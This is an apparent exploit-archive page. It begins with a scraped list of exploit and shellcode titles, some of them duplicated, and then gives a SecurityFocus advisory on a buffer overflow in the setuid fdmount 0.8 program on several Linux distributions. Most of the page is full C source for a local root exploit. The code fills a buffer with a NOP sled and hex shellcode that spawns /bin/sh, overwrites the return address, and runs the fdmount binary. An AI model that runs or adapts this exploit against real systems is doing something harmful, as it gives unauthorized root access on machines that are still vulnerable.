
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
55 lines
No EOL
2 KiB
C
55 lines
No EOL
2 KiB
C
// source: https://www.securityfocus.com/bid/1239/info
|
|
|
|
A buffer overflow exists in the 0.8 version of the fdmount program, distributed with a number of popular versions of Linux. By supplying a large, well crafted buffer containing machine executable code in place of the mount point, it is possible for users in the 'floppy' group to execute arbitrary commands as root.
|
|
|
|
This vulnerability exists in versions of S.u.S.E., 4.0 and later, as well as Mandrake Linux 7.0. TurboLinux 6.0 and earlier ships with fdmount suid root, but users are not automatically added to the 'floppy' group. This list is by no means meant to be complete; other Linux distributions may be affected. To check if you're affected, check for the presence of the setuid bit on the binary. If it is present, and the binary is either world executable, or group 'floppy' executable, you are affected and should take action immediately.
|
|
|
|
/* fdmount exploit
|
|
*
|
|
* by [WaR] <war@genhex.org> and Zav <zav@genhex.org>
|
|
*
|
|
* usage: ./fdmountx <offset>
|
|
* try with offset around 390 (you'll only get one try)
|
|
*
|
|
* Shout outs to all of the GenHex crew, and to
|
|
* the #newbreed at irc.ptnet.org.
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
|
|
#define BUFFSIZE 70
|
|
|
|
char shell[] = /* by Zav */
|
|
"\xeb\x33\x5e\x89\x76\x08\x31\xc0"
|
|
"\x88\x66\x07\x83\xee\x02\x31\xdb"
|
|
"\x89\x5e\x0e\x83\xc6\x02\xb0\x1b"
|
|
"\x24\x0f\x8d\x5e\x08\x89\xd9\x83"
|
|
"\xee\x02\x8d\x5e\x0e\x89\xda\x83"
|
|
"\xc6\x02\x89\xf3\xcd\x80\x31\xdb"
|
|
"\x89\xd8\x40\xcd\x80\xe8\xc8\xff"
|
|
"\xff\xff/bin/sh";
|
|
|
|
|
|
main(int argc, char **argv)
|
|
{
|
|
int i,j;
|
|
char buffer[BUFFSIZE+6];
|
|
unsigned long eip=(unsigned long)&eip;
|
|
unsigned long *ptr;
|
|
|
|
|
|
if(argc>1)
|
|
eip+=atoi(argv[1]);
|
|
|
|
memset(buffer,0x90,75);
|
|
memcpy(buffer+(BUFFSIZE-strlen(shell)),shell,strlen(shell));
|
|
|
|
ptr=(unsigned long*)(buffer+71);
|
|
*ptr=eip;
|
|
|
|
buffer[75]=0;
|
|
buffer[0]='/';
|
|
|
|
execl("/usr/bin/fdmount","fdmount","fd0",buffer,NULL);
|
|
} |